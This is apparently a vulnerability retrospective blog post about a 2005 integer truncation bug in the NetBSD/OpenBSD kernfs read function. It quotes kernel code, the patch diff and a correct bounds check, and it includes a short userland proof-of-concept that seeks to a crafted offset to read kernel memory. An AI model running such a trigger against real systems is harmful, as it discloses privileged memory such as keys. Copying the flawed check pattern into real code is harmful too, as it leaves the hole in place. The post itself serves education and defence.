Time is an Illusion
[Editor's Note: This is part one of a two-part post, the second of which is Vineetha Paruchuri's guest co-post, which can be found here.]
It makes sense to me that physicists have been arguing against time as a physical construct for years now, because as humans we have a clear penchant for ignoring time altogether. More precisely, we seem to ignore history as if it never happened. And, when we do recall historical events, we somehow do so erroneously. This isn't just true in the world of politics or law; it's true in every facet of society. Tech, and sometimes especially tech, is no outlier.
In 2005, I was bored, making silly bets with friends on IRC about how fast we could find exploitable bugs in "secure" operating systems. This was pretty common for us, as young hackers spend the majority of their time reading source code. A good friend pointed out that the increased scrutiny on the BSD variants was decreasing the number of exploitable integer overflow attacks on kernels. I argued that this was probably false, and that there were lots of bugs yet to be found.
What's interesting is that this bug class is still prevalent today. In fact, it may be the most underreported bug class in the history of computing. The LZO and LZ4 memory corruption bugs I released in 2014 were of the exact same class of exploitable integer issues. Because of pointer arithmetic, and how CPUs manage the indexing of memory, these flaws are extremely difficult to find and remediate. The difficulty of this bug class allowed the LZO vulnerability to persist in the wild for over 20 years, and allowed variants of LZO, such as LZ4, to be created with the same vulnerability.
Finding the Bug
Back to my friends and me on IRC: we made a bet. Find an exploitable kernel vulnerability affecting any BSD variant within an hour; the winner gets bragging rights. I almost lost, having found the bug in literally 57 minutes and some seconds.
The bug? An integer truncation flaw in the NetBSD and OpenBSD kernfs pseudo-filesystem. This file system provides access to kernel abstractions that the user can read to identify the state of the running kernel. In Linux terms, these abstractions would all be handled by procfs. On BSD, procfs was (is?) a pseudo-filesystem providing insight only into active processes themselves. On Linux, procfs provides access to kernel objects ranging from the CPU, to the VMM, to processes, and even network abstractions.
The flaw was discovered by trolling through NetBSD patches. In fact, I discovered the bug by identifying a patch for a similar integer problem committed days earlier, simply by chance. Because I constantly monitored the patches for all BSDs, it was easy to troll through them, identifying ones that might be valuable. An interesting commit tag caught my eye:
Revision 1.112 / (download) - annotate - [select for diffs], Thu Sep 1 06:25:26 2005 UTC (10 years, 10 months ago) by christos
Branch: MAIN
CVS Tags: yamt-vop-base3, yamt-vop-base2, yamt-vop-base, thorpej-vnode-attr-base, thorpej-vnode-attr
Branch point for: yamt-vop
Changes since 1.111: +6 -6 lines
Diff to previous 1.111 (colored)
Also protect the ipsec ioctls from negative offsets to prevent panics
in m_copydata(). Pointed out by Karl Janmar. Move the negative offset
check from kernfs_xread() to kernfs_read().
As depicted above, the patch applied at revision 1.112 purports to prevent multiple integer-related bugs from being triggered in the kernfs_xread function. It does so by moving the check for valid read offsets into kernfs_read. One might think, at this point, that this is a solved problem: presumably all bugs in the former function can be resolved by placing the check in the latter, parent function.
However, there is an easy-to-spot problem in the patch. Consider the following code:
int
kernfs_read(v)
    void *v;
{
    struct vop_read_args /* {
        struct vnode *a_vp;
        struct uio *a_uio;
        int a_ioflag;
        struct ucred *a_cred;
    } */ *ap = v;
    struct uio *uio = ap->a_uio;
    struct kernfs_node *kfs = VTOKERN(ap->a_vp);
    char strbuf[KSTRING], *bf;
    off_t off;
    size_t len;
    int error;

    if (ap->a_vp->v_type == VDIR)
        return (EOPNOTSUPP);

    /* Don't allow negative offsets */
    if (uio->uio_offset < 0)
        return EINVAL;

    off = uio->uio_offset;
    bf = strbuf;
    if ((error = kernfs_xread(kfs, off, &bf, sizeof(strbuf), &len)) == 0)
        error = uiomove(bf, len, uio);
    return (error);
}
Initially, this looks appropriate. The function now checks to see if the file descriptor associated with a kernfs file has a negative read offset. If a negative offset is identified, the function returns with an error. Otherwise, the offset is passed to kernfs_xread and presumed safe for all operations within that function.
This should be fine, except for the function kernfs_xread itself. Here is the definition of the function:
static int
kernfs_xread(kfs, off, bufp, len, wrlen)
    struct kernfs_node *kfs;
    int off;
    char **bufp;
    size_t len;
    size_t *wrlen;
{
In BSD variants, the off_t type is always a signed 64-bit integer to accommodate large files on modern file systems, regardless of whether the underlying architecture is 32-bit or 64-bit. The problem arises when the 64-bit signed integer is checked for its sign bit, then passed to the kernfs_xread function. Passing the off_t to the function truncates the value to a 32-bit signed integer, which means the check for a negative 64-bit integer is invalid. An adversary need only set bit 31 of the 64-bit offset to ensure that the value passed to kernfs_xread is negative.
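To see the narrowing in isolation, consider the following standalone sketch of the arithmetic (this is not the kernel code, just an illustration of the truncation):

#include <stdio.h>
#include <stdint.h>

int
main(void)
{
    /* off_t on BSD is a signed 64-bit integer; model it with int64_t here. */
    int64_t uio_offset = 0x0000000080000000LL;  /* bit 31 set, but positive as a 64-bit value */

    /* The kernfs_read() check operates on the full 64-bit value and passes. */
    if (uio_offset < 0)
        return 1;

    /* kernfs_xread() receives the offset as a plain int, truncating the value.
     * On a typical two's-complement system the result is -2147483648. */
    int off = (int)uio_offset;

    printf("64-bit offset: %lld, truncated int: %d\n", (long long)uio_offset, off);
    return 0;
}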
The result of this integer truncation bug can be observed at the end of kernfs_xread, where we have the following code, regardless of which type of kernfs pseudo-file is being read:
    len = strlen(*bufp);
    if (len <= off)
        *wrlen = 0;
    else {
        *bufp += off;
        *wrlen = len - off;
    }
    return (0);
}
With a negative off, this code produces a very large size for the data copied back to userland, and a pointer to the data being copied that points outside the valid memory buffer for the given file. What's really great about this bug is that both kernel stack and kernel heap can be referenced, depending on which kernfs file is being read while triggering the bug.
This allows an attacker to page through heap memory, which may contain the contents of privileged files, binaries, or even security tokens such as SSH private keys. Paging through stack memory is less immediately valuable, but allows an attacker to disclose other tokens (such as kernel stack addresses) that may be relevant to subsequent attacks.
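For context, a userland trigger would presumably have looked something like the sketch below: open a kernfs pseudo-file, seek to an offset with bit 31 set, and read. The choice of /kern/version as the target file is purely illustrative, and error handling is minimal.

#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int
main(void)
{
    char buf[4096];
    ssize_t n;
    int fd;

    /* Any readable kernfs pseudo-file should do; /kern/version is an illustrative choice. */
    fd = open("/kern/version", O_RDONLY);
    if (fd < 0)
        return 1;

    /* Positive as a 64-bit off_t, negative once truncated to int inside kernfs_xread(). */
    if (lseek(fd, (off_t)0x80000000LL, SEEK_SET) == -1)
        return 1;

    /* If the bug is present, the read copies kernel memory from outside the file's buffer. */
    n = read(fd, buf, sizeof(buf));
    if (n > 0)
        fwrite(buf, 1, (size_t)n, stdout);

    close(fd);
    return 0;
}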
Patching the Bug
Though this vulnerability affected both NetBSD and OpenBSD, OpenBSD claimed that "it isn't a vulnerability" because they had previously removed the kernfs filesystem from the default OpenBSD kernel. However, it was still buildable in the OpenBSD tree at the time, meaning that it was indeed a vulnerability in their source tree; it just wasn't a vulnerability by default. This was yet another misstep in a long-standing career of misdirection by the core OpenBSD team. The NetBSD team reacted quickly, as kernfs was not only still integrated into the default kernel, it was mounted by default, allowing any unprivileged user to abuse this bug.
I sold this vulnerability to Ejovi Nuwere's security consulting firm, which ethically acquired software flaws in order to help promote its consulting practice. Tim Newsham reviewed the flaw and agreed that it was an interesting finding. Ejovi's team managed the relationship during patching and helped develop the resolution with the NetBSD team, who were quick to patch the bug. I was impressed with Ejovi's professionalism, and also appreciated the NetBSD team's fast work, and the fact that they didn't whine about the bug the way OpenBSD did.
The patch fixed the bug by performing the check on the truncated integer rather than on the signed 64-bit offset.
@@ -922,18 +922,18 @@ kernfs_read(v)
 	struct uio *uio = ap->a_uio;
 	struct kernfs_node *kfs = VTOKERN(ap->a_vp);
 	char strbuf[KSTRING], *bf;
-	off_t off;
+	int off;
 	size_t len;
 	int error;
 
 	if (ap->a_vp->v_type == VDIR)
 		return (EOPNOTSUPP);
+	off = (int)uio->uio_offset;
 	/* Don't allow negative offsets */
-	if (uio->uio_offset < 0)
+	if (off < 0)
 		return EINVAL;
-	off = uio->uio_offset;
 	bf = strbuf;
 	if ((error = kernfs_xread(kfs, off, &bf, sizeof(strbuf), &len)) == 0)
 		error = uiomove(bf, len, uio);
Breaking the Historical Cycle
While we considered the patch adequate at the time, we were wrong. The reason follows from the logic of the first This Old Vulnerability blog post: an integer doesn't need to be negative to create a negative offset, or an overflow or underflow, when applied to an arbitrary pointer in kernel memory. This is because the value of any given pointer does not start at address zero, a presumption often made in systems engineering.
Tests often presume a base address of zero rather than the pointer's actual address plus the offset applied to it. If a 32-bit pointer holds the address 0xb0000000UL, an integer overflow will occur with an offset far smaller than what would be required to set a sign bit. If that pointer address and a sufficiently large offset are used in an inadequate expression, the test may appear to pass. Consider the following pseudo-example:
uint32_t *p = (uint32_t *)0xb0000000UL;     /* base of the buffer */
uint32_t off = 0x60000000UL;                /* attacker-supplied offset */
uint32_t *max_p = (uint32_t *)0xb0008000UL; /* end of the buffer */

/* off is unsigned, so off < 0 is always false; p + off overflows and
 * can wrap to an address below max_p, so the check passes anyway. */
if (off < 0 || p + off >= max_p)
    return EINVAL;
Some compilers will actually optimize away parts of the above code: off is unsigned, so off < 0 can never be true, and pointer arithmetic is assumed never to overflow, so the second comparison may be simplified away as well. If engineers don't notice this, if the compiler prints no warning message, or if the IDE in use doesn't adequately highlight the warning messages, the result can be critical flaws in software.
Testing this properly requires a policy that evaluates both the base of the pointer and a ceiling for the pointer, given the context of its usage. If a pointer points to a structure of a particular size, any expression that results in an address must be verified to land within that structure. This can be done by performing the operation, storing the result in the appropriate type, and then evaluating whether the address falls within the structure in memory.
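A minimal sketch of what such a check might look like follows. The function and parameter names are hypothetical, not taken from any particular codebase; the point is that the arithmetic is performed first, stored in an integer type wide enough to hold an address, and then compared against the real bounds of the buffer rather than against zero.

#include <stddef.h>
#include <stdint.h>
#include <errno.h>

/*
 * Illustrative sketch: validate a read of 'len' bytes at byte offset 'off'
 * into a buffer of 'buf_size' bytes starting at 'base'.
 */
static int
check_access(const char *base, size_t buf_size, size_t off, size_t len)
{
    const uintptr_t start = (uintptr_t)base;
    const uintptr_t limit = start + buf_size;   /* one past the end of the buffer */

    /* Reject offsets beyond the buffer so the address computation cannot wrap. */
    if (off > buf_size)
        return EINVAL;

    /* Perform the operation and store the result in an appropriate type... */
    const uintptr_t addr = start + off;

    /* ...then verify the whole access [addr, addr + len) lands inside [start, limit). */
    if (len > (size_t)(limit - addr))
        return EINVAL;

    return 0;
}

A caller would invoke check_access(buf, sizeof(buf), user_off, user_len) before ever dereferencing buf + user_off, so the context of the pointer, not an assumed base of zero, drives the test.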
As noted in the previous blog post, this requires organizational coding standards that enforce policies on how pointer expressions are evaluated and how they are tested. It also requires an evaluation of the context of each pointer.
As always, these improvements are challenging to implement because they aren't simply a coding construct. This is an organizational problem that must be addressed at the management level along with each individual engineer's coding practices. Peer reviews must be augmented with policies that guide auditing practices and guarantee a higher level of success in catching and fixing these issues. For help, consider hiring Lab Mouse Security to assist with your internal code audits, and break the seemingly eternal cycle of exploitable integer vulnerabilities!
An Introduction
For those that don't know her, Vineetha Paruchuri is a brilliant up-and-coming information security researcher. She and I have been discussing the effects of security flaws that have persisted for decades, why langsec addresses some of the potential for remediation and mitigation, and what gaps still remain.
This resulted in a guest post where Vineetha evaluates modern active models for the reduction of security flaws, rather than retrospective models such as code reviews, bug reports, and the like. I highly suggest reading her guest blog as a companion piece to this one, and as a primer for anyone interested in the modern movement toward active, rather than passive, vulnerability reduction models.
Don A. Bailey
Founder and CEO